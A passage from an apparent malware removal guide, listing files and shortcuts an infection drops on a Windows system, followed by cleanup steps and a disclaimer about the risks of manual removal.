    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\r[1].json (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk (2 bytes)
    C:\Windows\PHTQYMp\WVqSMf.dll (16404 bytes)
    C:\Windows\PHTQYMp\GMpkepQXi.dll (12 bytes)
    C:\Windows\ovhlpnij.dll (13 bytes)
    C:\Users\Public\Desktop\Mozilla Firefox.lnk (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk (1 bytes)
    C:\Users\"%CurrentUserName%"\Favorites\Links\Web Slice Gallery.url (276 bytes)
    C:\Windows\PHTQYMp\QPofTRsG.dll (992 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\desktop.ini (67 bytes)
    C:\Windows\System32\1428b5\CDClient_EX.sys (117 bytes)
    C:\Windows\PHTQYMp\oBIxFFT.tmp (12 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing (12 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk (1 bytes)
    C:\Windows\PHTQYMp\LNYxeOwQr.dll (264 bytes)

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
